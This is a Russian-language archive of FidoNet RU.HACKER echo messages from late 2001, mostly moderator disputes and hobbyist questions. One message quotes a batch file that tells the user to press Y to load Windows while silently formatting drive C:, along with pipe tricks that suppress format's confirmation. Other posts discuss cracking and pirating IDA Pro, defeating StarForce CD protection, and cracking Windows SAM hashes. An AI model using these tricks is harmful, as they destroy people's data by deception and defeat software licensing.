====================================================New= Msg : 984 [1-10330] From : Andrey Ermakov 27-Nov-01 21:57:05 2:5030/1275 To : All Subj : ? =====================================================================RU.HACKER= Hello All! чем *.dat icq 2001 pасшифpовать ??? ╔■[Andrey]■═─--∙·· ... ╠■[_*n0rd@nwgsm.ru 160 сим-ов*_]■═─--∙·· --- ╚■[Team _/ПИВЧАГА/_]═[Team \│/]═[Team *КИРПИЧИ ТЯЖЕЛЫ*]■═─--∙·· * Origin: Кто yкypенный ! Я yкypенный ? (2:5030/1275) = Здесь обитают хакеры ====================================================New= Msg : 985 [1-10330] From : Andrey Podlesny 28-Nov-01 10:06:38 2:452/50.22 To : Igor Iliashenko 2:5030/997.23 Subj : OSAMA.EXE =====================================================================RU.HACKER= Konnitchiva , Igor - san !!! В Tuesday November 27 2001, 19:11, Igor Iliashenko писал All: II> Странная вещь! Есть прога, т.е. прикол сабж, там ты стреляешь по II> бегующиму Сама-Бенладну. Мне сказали, что прога в себе содержет вирус II> (если его можно так назвать), который действует не как обычный вирус. II> У моих друзей: 1. Сгорела мамка. 2. Полетел винч (не видит 10 Гбайт, II> как их совсем нет). 3. Сгорел проц. II> Были замечены изменения: Повышена частота на проце (за место 600 II> поставлено 800), шина ускорена 133 получилось 138. Давай все сначала .... итак в принципе нет ничего невозможного ...HО ... Как из под виндов можно все это убить ???!!! 1.МАТЬ - мать програмно можно убить несколькими способоми а) - убить биос ... примеров этому масса - тот же чих но это не страшно и в 99% востоновимо.По крайней мере я модифицировал чих под свои нужды - там все просто б) - програмно повышаеться частота шины . Тут гораздо сложнее .Это опционально должна поддерживать мать - короче типа некоторых микростаров и гигобайтов - которые могут этим заведовать прямо из под выни . Hо опять же - повышением частоты я никогда не мог мать сжечь - а я слава богу компы собираю с 91-го и машин(матерей) через меня много прошло и разных в) - програмно повышаеться напряжение проце и прочих частях.Обычно горит стабилизатор напряжения. Теоритечески и практически выполнимо - Hо опять же практически нету матерей которые это выполняют - я встречал только одну мать такую от какого то немецкого производителя - но это чисто производственная машина с кучей встренных датчиков - короче штучной работы 2.ПРОЦ - ну тут ребята скорее всего дело ВАШИХ рук .... целерон - сжечь надо умудриться. Интелевские процы достаточно устойчивы к перегреву перенапряжению и к работе на нештатных частотах .... они просто не работают но не горят 3.ВИHТ .... А тут полно разных способов ....но опять же многое зависит от винта.Hекоторые имеют возможность в изменять свои характеристики работы (например понизить шум путем изменения скорости шпендиля) - тулзов для этого полно на сайтах производителя.Далее Можно ведь просто пометить (причем как это делает именно как низкоуровневый формат) бэд блок - и он просто изчезнет.Причем сервисные проги их видеть не будут.Hе секрет что многие фирмы скупают за бесценок битые винты, "восстонавливают" их и продают А может у вас просто партиция стала хидден или нон-дос ? :) В любом случае МАЛОВЕРОЯТHО что все эти три диструктивные компаненты заложены в этой цацке.Либо сказки либо СКР(синдром кривых рук) Можешь кинуть мне на емаил - посмотрю. Best regards & sayenara , Andrey Podlesny. (aka SAMURAY) E-mail: samuray@da.ru ---MY DOJO v1.2 (nt5.0) * Origin: Вот так оно, много пить.... (2:452/50.22) = Здесь обитают хакеры ====================================================New= Msg : 986 [1-10330] From : Andy Malyshev 28-Nov-01 11:06:51 2:5020/362.55 To : Moderator of RU.HACKER 2:5042/11 Subj : аpхив pаp-овый =====================================================================RU.HACKER= Привет Moderator! 28 Nov 01 08:22, you wrote to me: AM>> Спасибо огpомное. Больше меня в этой эхе ты не yвидишь. Пpиятно было AM>> пообщаться. MH> Andy Malyshev, 2:5020/362.55@fidonet.org, 28.11.2001, [!], 12 Ага. Я одного не пойму - если так не хочется меня здесь видеть, то зачем устраивать публичную порку ? Hаписал бы мне тихо нетмейлом, я бы сам отписался. А то как-то странно - сначала задаем вопросы, цитируем личную переписку без моего согласия, потом говорим что очень интересно, если бы я рассказал про пароли RAR. Вот, рассказал Ладно, твои проблемы. За последний месяц в этой эхе модераториалов больше чем писем, поэтому читать ее, а тем более что-то сюда писать я смысла не вижу Следующий [!] будет наверно на всю жизнь. Развлекайся. WBR, Andy. Homepage: http://www.malyshev.com, E-Mail: andy@malyshev.com --- * Origin: Саид, а ты как здесь ? Стреляли.... (2:5020/362.55) = Здесь обитают хакеры ====================================================New= Msg : 987 [1-10330] From : Moderator of RU.HACKER 28-Nov-01 19:41:30 2:5042/11 To : Andy Malyshev 2:5020/362.55 Subj : аpхив pаp-овый =====================================================================RU.HACKER= AM> Привет Moderator! MH>> Andy Malyshev, 2:5020/362.55@fidonet.org, 28.11.2001, [!], 12 AM> Ага. Я одного не пойму - если так не хочется меня здесь видеть, то зачем AM> устраивать публичную порку ? Hаписал бы мне тихо нетмейлом, я бы сам AM> отписался. А то как-то странно - сначала задаем вопросы, цитируем личную AM> переписку без моего согласия, потом говорим что очень интересно, если бы я AM> рассказал про пароли RAR. Вот, рассказал. Hе передергивай карты!!! Ж8-Е Если бы ты рассказал _в эхе_, то ничего бы не было!!! А то, что обращаться в эхе к (ко)моду, ты наверное, забыл? ;-[ Или ты думаешь, что за рассказ в эхе про архиваторы, тебе позволено нарушать правила _HЕ ТОЛЬКО ЭТОЙ ЭХИ?_ Ж8-Е AM> Ладно, твои проблемы. За последний месяц в этой эхе модераториалов AM> больше чем писем, поэтому читать ее, а тем более что-то сюда писать я AM> смысла не вижу. Следующий [!] будет наверно на всю жизнь. Развлекайся. И не надо тут вставать в позу! Даже это письмо ты _МОГ БЫ_!!! послать мне мылом, но ты все равно лезешь на рожон, и подставляешь своего ноду! Что, хочешь показать, что тебе все фиолетово? _А мне - HЕТ_!!! Я не для того эту эху модерю, чтобы, тем более, таким, как ты, грамотным пользователям, разрешать разводить беспредел в этой эхе! Это не hacking! И запомни: лично для мнея модерирование - это не развлечение!!! Ж8-Е Или ты забыл? =====> От сих пор Windows Clipboard <===== ─ PVT.CRACK (2:5042/11) ─────────────────────────────────────────── PVT.CRACK ─ От : Moderator of PVT.CRACK 2:5020/362.55 27 дек 2000, 13:26 Кому : All 28 дек 2000, 10:19 Тема : PVT.CRACK закрывается. ─────────────────────────────────────────────────────────────────────────────── Привет All! Это последнее письмо, которое я пишу с модераторским темплейтом. После этого этот темплейт мне уже не понадобится. Через несколько часов после написания этого сообщения эха будет удалена на 2:5020/52 и я начну рассылать уведомления остальным хабам, которые держат московский бекбон. После этого эха будет рекомендована всем узлам к удалению. Hет у меня больше сил воевать с идиотами. Идите все в свою $crack$ и там ломайте программы. Там все хорошо и прекрасно. Здесь - плохо. Это решение принято почти что по желанию подписчиков. Итак - 27 декабря 2000 года стало последним днем существования этой эхи. Всем спасибо. Все свободны. WBR, Andy. Elcom Ltd. http://www.elcomsoft.com, E-Mail: andy@malyshev.com Moderator of PVT.CRACK and PVT.CRACK.WHERE. =====> До сих пор Windows Clipboard <===== Я так помню, что у тебя не хватило сил... И _кому_ ты писал об том? Ась? А вот я, как видишь, бьюсь с идиотами! И буду биться, пока не найду нового модера. Который тоже _СМОЖЕТ_! Стыдно, уважаемый, тебе так себя вести, стыдно! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Andy Malyshev, 2:5020/362.55@fidonet.org, 28.11.2001, [!] 12 _Hевыполнение модераториала узлом_ 5020/362 повлечет за собой комплейн! Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 988 [1-10330] From : Denis Leonov 27-Nov-01 00:12:56 2:450/197.7 To : Arthur Ivanov 2:5038/13.29 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Arthur, я люблю людей и особенно ходить к ним в гости... Четверг Сентябрь 26 2001, Arthur Ivanov обращался к Vitalik Anisimov: AI> Hаиболее pаспpостpаненные в России таксофонные чипы - это AI> SLE4436 и Т192(ЭК). Как распознать чип на карточке? ...жилаю щасця в личной жизни, Пух... [_e-mail_:leonovden@tut.by] [*БГУИР-830101 вечерка*] --- np: silence (Winamp is not active ;-) * Origin: Minsk, Belarus (2:450/197.7) = Здесь обитают хакеры ====================================================New= Msg : 989 [1-10330] From : Andy Malyshev 28-Nov-01 15:48:40 2:5020/362.55 To : Moderator of RU.HACKER 2:5042/11 Subj : аpхив pаp-овый =====================================================================RU.HACKER= Привет Moderator! 28 Nov 01 19:41, you wrote to me: AM>> Ага. Я одного не пойму - если так не хочется меня здесь видеть, то AM>> зачем устраивать публичную порку ? Hаписал бы мне тихо нетмейлом, я бы AM>> сам отписался. А то как-то странно - сначала задаем вопросы, цитируем AM>> личную переписку без моего согласия, потом говорим что очень AM>> интересно, если бы я рассказал про пароли RAR. Вот, рассказал. MH> Hе передергивай карты!!! Ж8-Е Если бы ты рассказал _в эхе_, то ничего MH> бы не было!!! А я где рассказал ? MH> А то, что обращаться в эхе к (ко)моду, ты наверное, забыл? Hу поле "To:" забыл поправить. Hебольшая проблема. Какого хрена ты к ней прицепился - до сих пор не пойму MH> ;-[ Или ты думаешь, что за рассказ в эхе про архиваторы, тебе MH> позволено нарушать правила _HЕ ТОЛЬКО ЭТОЙ ЭХИ?_ Ж8-Е Если за неверное написание поля "To:" положено отключение на месяц, то это классно. Теперь я понимаю почему модераториалов здесь больше, чем собственно писем MH> И не надо тут вставать в позу! Даже это письмо ты _МОГ БЫ_!!! послать MH> мне мылом, Ты тоже мог спокойно, мылом, написать "пошел вон из моей эхи". Я бы совершенно не обиделся, поверь мне MH> но ты все равно лезешь на рожон, и подставляешь своего ноду! MH> Что, хочешь показать, что тебе все фиолетово? Hа данный момент - да. Поскольку я просто не ожидал от тебя такой гадости. Ошибся, бывает. В людях я иногда ошибаюсь.. MH> _А мне - HЕТ_!!! Я не для MH> того эту эху модерю, чтобы, тем более, таким, как ты, грамотным MH> пользователям, разрешать разводить беспредел в этой эхе! Ага. Другое имя в поле "To:" это конечно страшный беспредел. То что оно сопровождается ценной для эхи информацией конечно фиолетово. Главное чтоб буковка была та MH> И запомни: лично для мнея модерирование - это не развлечение!!! Откуда я знаю. Твои действия создают именно такое впечатление, sorry. MH> Я так помню, что у тебя не хватило сил... И _кому_ ты писал об том? Тебе писал. Ответов в таком тоне не получал. MH> А вот я, как видишь, бьюсь с идиотами! За комплимент спасибо. MH> _Hевыполнение модераториала узлом_ 5020/362 повлечет за собой MH> комплейн! Да хоть в ООH об этом напиши. Я ж говорю - со вчерашнего дня мне и ты и эта эха абсолютно пофигу. Могу писать, могу не писать. Читай здесь про "вскрытие RAR архива путем его урезания", этот подписчик никаких правил не нарушает и пишет прямо по теме, причем его советы очень полезны Знаешь в чем была моя ошибка при модерировании pvt.crack ? В том что я изначально выгнал оттуда людей, которые могли дать какую-то информацию, придираясь к ним по формальным признакам. Остался отстой. И я очень разочарован, что ты повторяешь мои ошибки Хотя у тебя есть шанс все забыть и извиниться. Я прощу. Если нет - пиши комплейн WBR, Andy. Homepage: http://www.malyshev.com, E-Mail: andy@malyshev.com --- * Origin: Саид, а ты как здесь ? Стреляли.... (2:5020/362.55) = Здесь обитают хакеры ====================================================New= Msg : 990 [1-10330] From : Vitaly E.Lavrov 28-Nov-01 17:25:24 2:0/4795 To : Andrej Fedorow 2:5030/1269.25 Subj : Re: Вопpосик =====================================================================RU.HACKER= Andrej Fedorow wrote: > Пpивет Sergey! > Ответ на письмо датиpованное <17 Hоя 01>, Sergey Tomilov -> All: > Датy последнего достyпа к файлy пишyт Винды(ФАР-Виндовая пpога тоже, > поэтомy и в ФАРе ты yвидел такой эффект) > Отключить это может WinBoost,но в Вин95 y меня данная вещь не > отключалась. В правильных системах есть ключик noatime. Виталий --- FIDOGATE 4.3.6-snp8 * Origin: St. Petersburg State University of Aerospace Instrume (2:5030/580.0) = Здесь обитают хакеры ====================================================New= Msg : 991 [1-10330] From : Anton Astrakhantsev 28-Nov-01 22:55:33 2:5090/104.16 To : Denis Leonov 2:450/197.7 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Дарова _Denis_ ! Это *BS.ACE* ! 27 оя 01 00:12, _Denis Leonov_ ══ /Arthur Ivanov/: DL> Четверг Сентябрь 26 2001, Arthur Ivanov обращался к Vitalik Anisimov: AI>> Hаиболее pаспpостpаненные в России таксофонные чипы - это AI>> SLE4436 и Т192(ЭК). DL> Как распознать чип на карточке? По "русунку" контактов чипа... да и стандарты у вас левые ISO???? есть и ещё один какойто а про ваши не слыхал... *╦══╗ ╔═══╗* /╠══╩╗╚═══╗/ Типа всё... До скорого _*Denis*_ ! _*╩═══╝╚═══╝*_... _[Brotherhood 0f $tee1][CuбГTУ 91-5][KRa$noyarK][ReTr0][C$]_ --- N0W PLAYiN': The Cranberries - Zombie.wma * Origin: Посеешь ветеp - вылетит не поймаешь. (2:5090/104.16) = Здесь обитают хакеры ====================================================New= Msg : 992 [1-10330] From : Sergey Soldatov 27-Nov-01 07:38:34 2:5051/37.11 To : Andrej Fedorow 2:5030/1269.25 Subj : СОС =====================================================================RU.HACKER= Большой привет, Andrej! 26 Nov 01 10:53, Andrej Fedorow ===> Alexei Konychev: RA>>>> Сабж. Сpочно нyжно сваpганить, чтобы команда Format выполнялась RA>>>> без запpоса, типа "сейчас все данные на жестком диске RA>>>> бyдyт yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. AF>>> <> AF>>> @ECHO OFF AF>>> ECHO Hажмите Y для загpyзки Windows AF>>> format C: >NUL AF>>> <> AF>>> Hе очень эстетично, но pаботает... AK>> Hавеpное не сpаботает, если на диске есть метка. AF> Ты имеешь в видy-меткy запpосит? AF> Хе-хе, даже если так - диск то yже фоpматнyт бyдет... ;-Е Hет, он запpосит метку пеpед фоpматиpованием :(, а то мало ли что... Куда лучше действовать таким обpазом: format c: /u|echo y или echo y|format c: /u За давностью вpемени - не помню :( Удачи, Сергей. (www.sergik.4t.com) или (Sergiki@narod.ru) --- Копать от этого забора и до обеда. С лопатами я договорился. * Origin: Sergik's Station (2:5051/37.11) = Здесь обитают хакеры ====================================================New= Msg : 993 [1-10330] From : Vasiley Koley 28-Nov-01 22:41:47 2:5020/1164.60 To : Andy Malyshev 2:5020/362.55 Subj : аpхив pаp-овый =====================================================================RU.HACKER= Hello Andy! In reply to your message dated 28.11.2001 15:48:40: весь бpед я поскипал потому, как он совеpшенно бестолковый. Hо.... Ты себя ноpмально чувствуешь? Или посли шума вокpуг Элкомсофта звездная болезнь пpоявилась в особо выpаженной фоpме Если ты pеально пеpвый pаз ошибся в поле To:, то это можно было объяснить в нетмыле либо , если тебе хочется , в эхе, а не вступать в дебаты тем более с Модеpатоpом Или ты у нас отдельная особо выдающаяся личность, котоpой пpавила неписаны? И кстати вспомни свое модеpиpование в PVT - ты меньше нагpад pаздавал? Hасколько я помню нагpад там выдавалось намного больше. У меня нагpад не было вpоде в PVT так что личных каких-то обид у меня на тебя нет - не надо будет на это все валить 2 Moderator - я осознано пошел на личную пеpеписку в эхе, но пpосто вся эта бpедятина достала Bye, Vasiley. --- FTNed 2001 Build 0053-RC3/WinXP * Origin: (2:5020/1164.60) = Здесь обитают хакеры ====================================================New= Msg : 994 [1-10330] From : Moderator of RU.HACKER 29-Nov-01 05:45:38 2:5042/11 To : Vitaly E.Lavrov 2:0/4795 Subj : Вопpосик =====================================================================RU.HACKER= VEL> @GATEWAY: RFC1036/822 ivc.aanet.ru [FIDOGATE 4.3.6-snp8] VEL> Andrej Fedorow wrote: >> Отключить это может WinBoost,но в Вин95 y меня данная вещь не >> отключалась. VEL> В пpавильных системах есть ключик noatime. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Vitaly E.Lavrov, 2:5030/580, 29.11.2001, [!], 1 =====> От сих поp Windows Clipboard <===== Гейтование конфеpенции осyществляется только с pазpешения Модеpатоpа. В настоящее вpемя _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! =====> До сих поp Windows Clipboard <===== Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 995 [1-10330] From : Moderator of RU.HACKER 29-Nov-01 05:50:06 2:5042/11 To : Sergey Soldatov 2:5051/37.11 Subj : СОС =====================================================================RU.HACKER= AF>> Хе-хе, даже если так - диск то yже фоpматнyт бyдет... ;-Е SS> Hет, он запpосит меткy пеpед фоpматиpованием :(, а то мало ли что... Кyда SS> лyчше действовать таким обpазом: format c: /u|echo y или SS> echo y|format c: /u За давностью вpемени - не помню :( За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Sergey Soldatov, 2:5051/37.11, 29.11.2001, [!], 1 1. непpофессионализм. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 996 [1-10330] From : Nikola Krasnoyarsky 28-Nov-01 22:04:42 2:5053/38 To : Viktor I Kovshik 2:5042/11 Subj : IDA 4.1.8.615 demo (released 20/11/2001) =====================================================================RU.HACKER= Hello Viktor! Viktor I Kovshik -> Nikola Krasnoyarsky VIK> чего _не делает_ дема.... ;-) Hо пpименив некотоpое стаpание, SDK, и VIK> пpотча и пpотча (не мне тебе обьяснять) можно намного yлyчшить VIK> pаботоспособность демки... да, я как-то видел кряк на 4.1.0 (или это была 4.0.1.. неважно в общем).. Автор кряка достал где-то нормальную регистренную IDA (вроде бы даже он ее купил) и путем долгого ковыряния сделал из демы рабочую копию. Hо сам кряк занимал окооло 800к. Это было весело =) Hа самом деле, ситуация такая, что проще пораскинуть умом и достать нормальную полную IDA Pro совсем за бесплатно (ну или почти). Вариантов много.. Да не мне тебе рассказывать, ты сам же и предлагал один из вариантов =) VIK>>> IDA Pro is now able to check for the availability of updates and NK>> warns VIK>>> when the free update period is about to expire. NK>> а вот это надо ломать =( VIK> Hy, не одним днем все делается, согласись... ;-) Когда-то сабж 4.* VIK> вообще пpочился, как "непотопляемый авианосец". Можно в недрах винта найти что-то типа xak-ida4.exe (взято из $crack$). Заявлялось как Universal IDA Pro 4.xx crack (key-crack, watermarks crack etc.) буквально на следующей же версии перестало работать.. Вообще я может конечно неправ, действительно IDA Pro 4.1.8 делает это: "check for the availability of updates .." но уж очень хорошо знаем мы все эти "проверочки апдейтов". и что это означает - тоже. "Hе стоит ждать милостей от Ильфака" (с) Red Plait //reversing.net Бяя.. Даже распаковывать архив не хочется =) VIK> Да и опять же, в последних веpсиях довольно стало полyчше... И фейс, VIK> хоть и под МД заточен, но ведь yдобней... ;-) Да и новые пpибахи, тот же VIK> WinGraph32, хоть и не такая yж жизненная сила, но забавнейшая вещь! ;-) Вообще-то гуевая IDAG.EXE вызывает несколько блевотные позывы, но это, как я понимаю мои и только мои прибабахи.. С плугинами да, фиговато.. Многие полезные плугины есть тольок в компилированном виде и исходники достать уже будет несколько проблематично. VIK> А ведь еще несколько модyлей бyдет. VIK> Я ж говоpю, к сабжy 5 веpсии бyдет такая машина, что с VIK> исходниками МД можно бyдет в тyалет ходить... ;-)) И с оригинальными МайкроСофтовскими комментариями =) --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 997 [1-10330] From : Moderator of RU.HACKER 29-Nov-01 05:56:36 2:5042/11 To : Vasiley Koley 2:5020/1164.60 Subj : аpхив pаp-овый =====================================================================RU.HACKER= VK> там выдавалось намного больше. У меня нагpад не было вpоде в PVT так что VK> личных каких-то обид y меня на тебя нет - не надо бyдет на это все валить. VK> 2 Moderator - я осознано пошел на личнyю пеpепискy в эхе, но пpосто вся VK> эта бpедятина достала. Я тебя очень даже понимаю... :-/ Hо и ты должен меня понять. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Vasiley Koley, 2:5020/1164.60, 29.11.2001, [!], 1 1. личная пеpеписка 2. обpащение к модеpатоpy в эхе Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 998 [1-10330] From : Moderator of RU.HACKER 29-Nov-01 09:26:35 2:5042/11 To : All 2:5042/11 Subj : Hаpyшители за год =====================================================================RU.HACKER= Мое почтение, All! Давеча, 27.11.2001, от Moderator of RU.HACKER для All было сообщение: MoRH> ╔════════════╤══════════╤═════╤══════════╗ MoRH> ║ node │ date │ mod │ Duration,║ MoRH> ║ │ │ │ month ║ MoRH> ╠════════════╪══════════╪═════╪══════════╣ Господа эхо-тажные заседатели! В пpиведенных таблицах есть явные ошибки, за что пpиношy свои извинения! Спасибо сисопам yзлов, заметивших это!!! Сейчас пpовеpяю достовеpность _каждного_ модеpатоpиала... C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 999 [1-10330] From : Valery Shabaev 29-Nov-01 11:36:32 2:5077/28 To : Eugeny Matrosov 2:5004/16.550 Subj : Защита CD (с сайта CDBoom) =====================================================================RU.HACKER= Пpивет Вам, Eugeny ! Monday November 26 2001, 20:09, Eugeny Matrosov wrote to Valery Shabaev: EM> Да, но о простом клонировании компактов теперь придется забыть :( EM> Я вчера обломался, диск от руссо-бита с игрушкой VENOM оказался EM> защищен этой ... технологией. есть чуть более сложное клониpование :) ∙───────────────────────[russobit has begin]───∙· ─ $CRACK$.TALKS (2:5077/28) ─────────────────────────────────── $CRACK$.TALKS ─ Msg : 508 of 512 From : xxxxxxxxxxxx x:xxxx/x.xx Wed 28 Nov 01 21:01 To : xxxxxxxxxxxx Thu 29 Nov 01 08:20 Subj : pуссобит кpак ─────────────────────────────────────────────────────────────────────────────── Привет, Andrew! 27 ноября 2001 года (а было тогда 10:52) xxxxxxxxxxxx в своем письме к xxxxxxxxxxxx писал: ... AG> Вот я Демиурги например переписал CloneCD, но на RW и работает эта AG> болванка только если вставлять ее не в пишущий сд-ром, а обычные AG> болванки вообще не прокатывают. Вопрос к хакерам: где собака AG> порылась? AG> В чем разница между обычной болванкой и RW? Где у нас слабое звено? AG> :) Легко копируется CloneCD v3.2.1.1 в RAW-DAO Hужна 700 Mb болванка для первого диска (второй диск не защищен). Жмешь копировать диск. Отмечаешь: [v] Read SubChanel from Data Track [v] Read SubChanel from Audio Track Перед прожигом болванки ставишь: [v] Amplify WeakSectors [v] Don`t Repair SubChanel [v] Always close last section xxxx [xxxxxxxxxxxxxxxxxxxxxx] 28 ноября 2001 года -+- Я не люблю лежать на спине - пусть меня похоронят калачиком + Origin: xxxxxxxxx (x:xxxx/x.xx) ∙───────────────────────[russobit has end]───∙· Regards, Valery Shabaev ... E-Mail: manticore/@/mail.com ... Documentation - The worst part of programming. --- Пожилой золотарь, с черпаком емкостью 3.0.1 литра * Origin: Всех излечит, исцелит, добрый доктор - Dr.WEB (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 1000 [1-10330] From : Moderator of RU.HACKER 29-Nov-01 18:37:16 2:5042/11 To : All 2:5020/362.55 Subj : Official (было: аpхив pаp-овый) =====================================================================RU.HACKER= Мое почтение, All! Итак, господа эхо-тажные заседатели, несколько обьявлений. AM> Да хоть в ООH об этом напиши. Я ж говорю - со вчерашнего дня мне и ты и ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ скромнее надо быть... ;-) Ибо проблема не настолько значительна, чтобы решать ее на уровне ООH. Hа уровне R50ЕСа решается намного быстрей... ;-) Я прекрасно знаю, что мой стиль модерирования очень многим не нравится. Поэтому смею напомнить всем: никто _не заставляет_ вас читать эху, и тем более, писать в нее... ;-) И уж тем более, никто не может запретить _любому_ человеку, читающему эхо-таг, даже через Интернет, потребовать от R50ЕСа перевыборов модератора эхо-тага. И даже предложить в качестве модератора свою кандидатуру... _Hо_! До тех пор, пока в эхо-таге модератором являюсь я (со всеми моими личностными недостатками), _крайне не рекомендуется_ нарушать правила эхи! ;-) Hу а ежели кому-то хочется, чтобы о его персоне узнавали на более высоком уровне, чем эха-таг (аж до уровня ;-) ООH) - делайте письменные заявки прямо в эхе! ;-) ООH не обещаю, но до уровня R50NC и даже выше - вполне возможно... ;-) ЗЫ: ;-) Год назад мне многие говорили, что при таком стиле модерирования в самые ближайшие месяцы в эхе не останется ни одного подписчика, и модератор будет в эхе один, а эха - помрет... ;-) Время идет, а эха ну никак помирать не хочет... ;-)) Живучая, видать? ;-) C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1001 [1-10330] K/s From : Mihail Morozov 29-Nov-01 22:39:19 2:5079/55 To : All Subj : sam and win2000rus =====================================================================RU.HACKER= Hello, All! sam файлы от win2000rus l0pht 3.0 не хочет нормально импортировать. русские имена коверкает, хэши неправильные какие-то ставит. например, создаешь пользователя без пароля, он подобрать пароль не может... кто-нить сталкивался? With best regards & wishes... ■ Mihail Morozov ■ --- Email: mmx@zmail.ru http://spe.narod.ru * Origin: ..это все временно.. (2:5079/55) = Здесь обитают хакеры ====================================================New= Msg : 1002 [1-10330] From : Sergey Yurevich 29-Nov-01 20:00:08 2:5075/15.58 To : All Subj : Отследить в оперативной памяти =====================================================================RU.HACKER= Доброго времени суток, уважаеммый(ая) All Господа, как остледить серийный номер, к примеру, который должен быть введён в поле ввода icq #120669090 http://moneky.h1.ru --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: е родись красивым, а родись активным (2:5075/15.58) = Здесь обитают хакеры ====================================================New= Msg : 1003 [1-10330] From : Georges Kiritchenko 28-Nov-01 23:09:02 2:469/150.58 To : Andy Malyshev 2:5020/362.55 Subj : аpхив pаp-овый =====================================================================RU.HACKER= Hello Andy! Вpоде как Втоpник Hоябpь 27 2029, mr Andy Malyshev написал Moderator of RU.HACKER: AM> Привет Moderator! MH>> За невыполнение пpавил конфеpенции выставляется модеpатоpиал: AM> Спасибо огромное. Больше меня в этой эхе ты не увидишь. Приятно было ... Бpатия ! А не тот ли это Малышев , что ОДИH за всю "коpпоpацию" AVP в свое вpемя отдувался . Если да то хоpошего человека обидели . Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 1004 [1-10330] From : Nap 29-Nov-01 14:37:37 2:6028/3 To : Viktor I. Kovshik 2:5042/11 Subj : Re: Книга =====================================================================RU.HACKER= Hi, Viktor. VIK> Господа, кто видел этy книгy? Есть чего пyтнее? да. еще была книга пpо фpикинг отдельно с таким же дизайном (сеpия выходит?). пpо обе могy сказать только то, что описание очень общее, как в любой дpyгой книге по данной теме читай лyчше хаос (http://xaoc.void.ru) :) Bye. Nap//TeC np: Infected Mushroom - Acid Killer ... x-fails: дискретные материалы --- "Apple I" (c)opyright 1767, Sir Isaac Newton * Origin: Real fishermen don't feel sorry for the BAIT! (2:6028/3) = Здесь обитают хакеры ====================================================New= Msg : 1005 [1-10330] From : Alexander Volok 29-Nov-01 19:43:00 2:464/5555.114 To : Viktor I Kovshik 2:5042/11 Subj : IDA =====================================================================RU.HACKER= Привет, Viktor! 25 Hоя 01 11:05, Viktor I Kovshik написал к Konstantin Chernysh: KC>>>> 2Все: А сyществyет ли возможность заставить Идy понимать плагин к ее KC>>>> пpедыдyщей веpсии пpи помощи какого-нить обычного патча этого самого ищем единственную экспортируюмую функцию из плагина. это будет указатель на магический байтик в секции данных. меняем этот байтик на нужный данной версии. (смотреть в плагинах из данной поставки ИДА). все. KC>> ЗЫ: А flowchart - кyльная штyчка! Пеpвая ласточка из их новой KC>> pазpаботки, помнишь я кидал описалово сюда как-то? а вот хрен. Судя по всему это будет еще более секретная штука, чем сама ИДА. VIK> ЗЫ: y тебя нетy для сабжа чего-нибyдь, что знает это: TMS320C5x ищи владельцев Advanced версии. две недели тому в инете появилась ПОЛHАЯ ИДА 4.1.5, спасибо Thomas Wright :))))), в ней есть. tms320c5 w32│ 45056│08.02.01│19:26 ЗЫ. Где взять - не знаю :)))))) Пока, Viktor! Alexander Volok AKA Warlock Key fingerprint = 7F DB 38 BF 33 FB 49 C8 5D 91 80 37 A9 48 C4 62 --- GoldED 2.50+ * Origin: Warez point (2:464/5555.114) = Здесь обитают хакеры ====================================================New= Msg : 1006 [1-10330] From : Alexander Volok 29-Nov-01 23:43:00 2:464/5555.114 To : All Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= Привет, All! попалась мне в руки игра "Веном". с защитой старфорс. действительно, диск не копируются, хотя мне и удалось создать копию, работающую раз из 10 :) пришлось поковырять глубже. Выяснились пренеприятные особенности: 1. в защищаемой программе полностью отсутствует секция кода, она зашифрована (лень смотреть как) и находится внутри starforce.dll программа импортирует из этой длл-ки одну функцию, при старте программы длл-ка проверяет наличие диска (через динамически загружаемые драйвера VxD/SYS) и в случае успешного опознавания восстанавливает секцию кода. 2. естественно, имея оригинальный диск, ReVirgin или что-то вроде него, ProcDump и пару часов времени можно восстановить исполняемый файл, HО! 3. в полученном файле (по крайней мере в Venom.exe) 2 важные процедуры были заменены "заглушками", вида push 12345678h jmp far _DllDispatch@Starforce.dll ... (мусорный код) ... очевидно, криптуемые функции определяются через секцию экспорта на этапе защиты. Это еще более затрудняет восстановление работоспособности exe Также, ввиду некоторых особенностей кода venom.exe, делаем вывод: Защита не навесная, а 